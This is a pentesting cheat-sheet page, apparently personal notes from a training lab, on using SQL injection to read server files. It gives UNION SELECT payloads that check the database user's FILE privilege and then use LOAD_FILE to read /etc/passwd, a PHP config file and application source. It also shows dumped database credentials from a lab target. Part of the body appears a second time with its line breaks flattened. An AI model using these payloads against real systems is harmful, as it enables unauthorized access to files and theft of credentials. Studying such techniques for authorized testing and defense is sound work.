SQLI READING FILES

IOF the DB user to load and read a file's content, the DB user must have the FILE privileges

IDENTIFYING DB USER FILE PRIVILEGES

root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
 * can add a filter WHERE user="root" to only show privileges for the current user named root
 * Y, means YES, indicating superuser privileges
 * ALT: cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
    - this cmd displays all of the possible privileges directly from the schema that is given to the current user
       - the FILE privilege is the most important as it enables the attacker to read local system files and potentially even write files

READING LOCAL SYSTEM FILES

#passwd file
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
 * this cmd will read the contents of the passwd file through the SQL injection
 * this method can also be used to potentially leak the application source code as well.

#reading the configuration file
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- -
 * 'localhost', 'DB_USERNAME'=>'root', 'DB_PASSWORD'=>'dB_pAssw0rd_iS_flag!', 'DB_DATABASE'=>'ilfreight' ); $conn = mysqli_connect($config['DB_HOST'], $config['DB_USERNAME'], $config['DB_PASSWORD'], $config['DB_DATABASE']); if (mysqli_connect_errno($conn)) { echo "Failed connecting. " . mysqli_connect_error() . ""; } ?> 

#reading source code file
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
 CTRL + U
 * to read the source code which may contain sensitive information like database 
   connection credentials or more vulnerabilities
 * the default Apache webroot is /var/www/html and the vulnerable page identified is
   search.php located at /var/www/html/search.php

PreviousCREDENTIAL DUMPING NextSQLI WRITING WEB SHELL FILES

Last updated 5 months ago

root@oco:~$ BROWSER > {targetSite:port} input field: ' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- - * can add a filter WHERE user="root" to only show privileges for the current user named root * Y, means YES, indicating superuser privileges * ALT: cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- - - this cmd displays all of the possible privileges directly from the schema that is given to the current user - the FILE privilege is the most important as it enables the attacker to read local system files and potentially even write files

READING LOCAL SYSTEM FILES

#passwd file
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
 * this cmd will read the contents of the passwd file through the SQL injection
 * this method can also be used to potentially leak the application source code as well.

#reading the configuration file
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- -
 * 'localhost', 'DB_USERNAME'=>'root', 'DB_PASSWORD'=>'dB_pAssw0rd_iS_flag!', 'DB_DATABASE'=>'ilfreight' ); $conn = mysqli_connect($config['DB_HOST'], $config['DB_USERNAME'], $config['DB_PASSWORD'], $config['DB_DATABASE']); if (mysqli_connect_errno($conn)) { echo "Failed connecting. " . mysqli_connect_error() . ""; } ?> 

#reading source code file
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
 CTRL + U
 * to read the source code which may contain sensitive information like database 
   connection credentials or more vulnerabilities
 * the default Apache webroot is /var/www/html and the vulnerable page identified is
   search.php located at /var/www/html/search.php